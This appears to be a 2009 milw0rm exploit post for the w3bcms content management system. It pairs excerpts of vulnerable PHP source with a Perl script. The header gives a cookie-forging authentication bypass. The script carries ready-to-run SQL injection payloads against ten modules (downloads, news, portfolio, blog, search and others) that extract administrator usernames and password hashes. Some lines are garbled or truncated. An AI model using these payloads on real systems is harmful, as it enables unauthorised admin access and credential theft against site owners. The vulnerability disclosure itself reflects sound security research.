w3bcms <= v3.5.0 Multiple Remote Vulnerabilities Exploit#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use Getopt::Long; # \#'#/ # (-.-) # -------------------oOO---(_)---OOo------------------ # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2oo9 | # ---------------------------------------------------- # | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities | # | (requires magic_quotes_gpc = Off) | # ---------------------------------------------------- # [!] Discovered.: DNX # [!] Vendor.....: http://www.w3bcms.de # [!] Detected...: 11.01.2009 # [!] Reported...: 17.01.2009 # [!] Response...: 19.01.2009 # # [!] Background.: CMS features in the frontend: # » Ausgabe angelegter Seiten # » Integrierter sicherer Spamschutz (kein Captcha!) # » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige # » Integrierter Besuchercounter (versteckt/sichtbar) # » Sicherheit gegen Hackangriffe # » Schnelle Datenbankabfragen # » 100% Suchmaschinenoptimiert (SEO) # » Erweiterbar durch Module & Addons # » Unterstützt Mod Rewrite URL's (optional) # # # [!] Info.......: Insecure Cookie Handling in Admin Backend Login # [!] Bug........: $_COOKIE[`cms_admin`] in admin/index.php near line 67 # # 67: if ($_COOKIE[`cms_admin`] != ``) { # 68: # 69: $admin = mysql_fetch_assoc(mysql_query(`SELECT * FROM admin WHERE cookie='`.$_COOKIE[`cms_admin`].`'`)); # 70: # 71: if ($admin['benutzername'] != ``) { # 72: # 73: $_SESSION['login'] = true; # 74: header(`Location: inc/index.php?seite=uebersicht`); # 75: exit; # 76: # 77: } # 78: # 79: } # # [!] PoC........: javascript:document.cookie = `cms_admin=' or '1'='1; path=/`; # # # [!] Info.......: Downloads module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/downloads/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == `klick`) { # 16: # 17: $data = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_downloads WHERE id='`.$_GET['id'].`'`)); # 18: mysql_query(`UPDATE modul_downloads SET klicks=klicks+1 WHERE id='`.$_GET['id'].`'`); # 19: $url = preg_replace('(%PAGE_DIR%)', $settings['page_dir'], $data['url']); # 20: header(`Location: `.$url.``); # 21: exit; # 22: # 23: } # # # [!] Info.......: News module v1.5.0 # [!] Bug........: $_GET['action'] in includes/module/news/index.inc.php near line 131 # # 131: $kcheck = eregi (`kommentar`, $_GET['action']); # # 135: if ($kcheck == `1`) { # 136: # 137: $str = $_GET['action']; # 138: $explode = explode(`.`,$str); # 139: # 140: $ausgabe = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_news WHERE id='`.$explode[0].`' AND status='0'`)); # # # [!] Info.......: Portfolio module v2.0.0 # [!] Bug........: $_GET['action'] in includes/module/portfolio/index.inc.php near line 75 # # 75: $kcheck = eregi (`show`, $_GET['action']); # 76: # 77: if ($kcheck == `1`) { # 78: # 79: $str = $_GET['action']; # 80: $explode = explode(`.`,$str); # 81: # 82: $ausgabe = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_portfolio WHERE id='`.$explode[0].`'`)); # # # [!] Info.......: Partner module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/partner/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == `klick`) { # 16: # 17: $data = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_partner WHERE id='`.$_GET['id'].`'`)); # 18: mysql_query(`UPDATE modul_partner SET klicks=klicks+1 WHERE id='`.$_GET['id'].`'`); # 19: # 20: header(`Location: `.$data['url'].``); # 21: exit; # 22: # 23: } # # # [!] Info.......: Mediathek module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/mediathek/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == `klick`) { # 16: # 17: $data = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_mediathek WHERE id='`.$_GET['id'].`'`)); # 18: mysql_query(`UPDATE modul_mediathek SET klicks=klicks+1 WHERE id='`.$_GET['id'].`'`); # 19: # 20: $mediafile = $settings['page_dir'].`/includes/media/`.$data['mediafile']; # 21: # 22: header(`Location: `.$mediafile.``); # 23: exit; # 24: # 25: } # # # [!] Info.......: Sitemap module v1.5.0 # [!] Bug........: $_GET['seite'] in includes/module/sitemap/index.inc.php near line 15 # # 15: $explode = explode(`.`,$_GET['seite']); # # 19: $menu = mysql_query(`SELECT * FROM pages WHERE submenu='0' AND aktiv='0' AND hidden='0' AND id!='`.$explode['0'].`' ORDER by sortierung`); # # # [!] Info.......: Links module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/links/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == `klick`) { # 16: # 17: $data = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_links WHERE id='`.$_GET['id'].`'`)); # 18: mysql_query(`UPDATE modul_links SET klicks=klicks+1 WHERE id='`.$_GET['id'].`'`); # 19: header(`Location: `.$data['url'].``); # 20: exit; # 21: # 22: } # # # [!] Info.......: Blog module v1.5.0 # [!] Bug........: $_GET['action'] in includes/module/blog/index.inc.php near line 133 # # 131: $kcheck = eregi (`kommentar`, $_GET['action']); # # 135: if ($kcheck == `1`) { # 136: # 137: $str = $_GET['action']; # 138: $explode = explode(`.`,$str); # 139: # 140: $ausgabe = mysql_fetch_assoc(mysql_query(`SELECT * FROM modul_blog WHERE id='`.$explode[0].`' AND status='0'`)); # # # [!] Info.......: Suche module v1.5.0 # [!] Bug........: $_POST['suchbegriff'] in includes/module/suche/index.inc.php near line 66 # # 66: $eingabe = trim(strip_tags($_POST['suchbegriff'])); # 67: $eingabe_array = explode(` `, $eingabe); # 68: $eingabe_array = array_unique($eingabe_array); # 69: # 70: if ($eingabe == `` || $_POST['suchbegriff'] == `Suchbegriff(e) ...`){ # 71: # 72: echo `

Fehler - Bitte mindestens ein Suchbegriff eingegeben!

`; # 73: # 74: } else { # # 78: $query_pages = `SELECT id, titel, inhalt, page FROM pages WHERE `; # 79: # 80: for ($i=0; $i`; print `\n[!] Example: perl w3blabor.pl -1 -u \`http://127.0.0.1/w3b/index.php?seite=2.down&action=klick&id=1\``; print `\n[!] Targets:`; print `\n -1 Exploit over Downloads module v1.5.0`; print `\n -2 Exploit over News module v1.5.0`; print `\n -3 Exploit over Portfolio module v2.0.0`; print `\n -4 Exploit over Partner module v1.5.0`; print `\n -5 Exploit over Mediathek module v1.5.0`; print `\n -6 Exploit over Sitemap module v1.5.0`; print `\n -7 Exploit over Links module v1.5.0`; print `\n -8 Exploit over Blog module v1.5.0`; print `\n -9 Exploit over Suche module v1.5.0`; print `\n -10 Exploit over Gallery module v1.5.0`; print `\n[!] Options:`; print `\n -u [url] URL to vuln website`; print `\n -p [ip:port] Proxy support`; print `\n`; exit; } my $ua = LWP::UserAgent->new(); my $response = ``; my %options = (); GetOptions(\%options, `1`, `2`, `3`, `4`, `5`, `6`, `7`, `8`, `9`, `10`, `u=s`, `p=s`); if($options{`p`}) { $ua->proxy('http', `http://`.$options{`p`}); } if($options{`1`}) { use_download_bug(); } elsif($options{`2`}) { use_news_bug(); } elsif($options{`3`}) { use_portfolio_bug(); } elsif($options{`4`}) { use_partner_bug(); } elsif($options{`5`}) { use_mediathek_bug(); } elsif($options{`6`}) { use_sitemap_bug(); } elsif($options{`7`}) { use_links_bug(); } elsif($options{`8`}) { use_blog_bug(); } elsif($options{`9`}) { use_suche_bug(); } elsif($options{`10`}) { use_gallery_bug(); } sub use_download_bug { my $url_user = $options{`u`}; my $url_pass = $options{`u`}; my $exploit_user = `id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*`; my $exploit_pass = `id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*`; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.`:`.$pass; } sub use_news_bug { my $url = $options{`u`}; my $exploit = `action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*`; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s) { print $1.`:`.$2; } } sub use_portfolio_bug { my $url = $options{`u`}; my $exploit = `action='%20union%20select%201,2,passwort,benutzername,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20limit 1/*`; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

([a-fA-F0-9]{32})<\/h1>.*?

(.*?)<\/p>/s) { print $2.`:`.$1; } } sub use_partner_bug { my $url_user = $options{`u`}; my $url_pass = $options{`u`}; my $exploit_user = `id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*`; my $exploit_pass = `id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*`; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.`:`.$pass; } sub use_mediathek_bug { my $url_user = $options{`u`}; my $url_pass = $options{`u`}; my $exploit_user = `id='%20union%20select 1,2,benutzername,4%20from%20admin%20limit%201/*`; my $exploit_pass = `id='%20union%20select 1,2,passwort,4%20from%20admin%20limit%201/*`; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.`:`.$pass; } sub use_sitemap_bug { my $url = $options{`u`}; $url =~ /seite=(\d+)\./; my $id = $1; my $exploit = `seite=`.$id.`'%20union%20select%201,benutzername,passwort,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin%20/*`; $url =~ s/seite=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /$id\.<\/strong>.*?get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.`:`.$pass; } sub use_blog_bug { my $url = $options{`u`}; my $exploit = `action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*`; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s) { print $1.`:`.$2; } } sub use_suche_bug { my $url = $options{`u`}.`&action=senden`; my $search = `###___###%'))/**/union/**/select/**/1,benutzername,passwort,4/**/from/**/admin/*`; my $req = POST $url, [suchbegriff => $search]; my $response = $ua->request($req); if($response->content =~ /.*`>(.*?)<\/a>
([a-fA-F0-9]{32}) \[/s) { print $1.`:`.$2; } } sub use_gallery_bug { my $url = $options{`u`}; my $exploit = `action='%20union%20select%201,2,passwort,4,benutzername,6%20from%20admin/*`; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); my @content = split(/\n/, $response->content); foreach (@content) { if($_ =~ /\/([a-fA-F0-9]{32})` rel=`lytebox\[.*?\]` title=`(.*?)`/) { print $2.`:`.$1.`\n`; } } } # milw0rm.com [2009-02-09]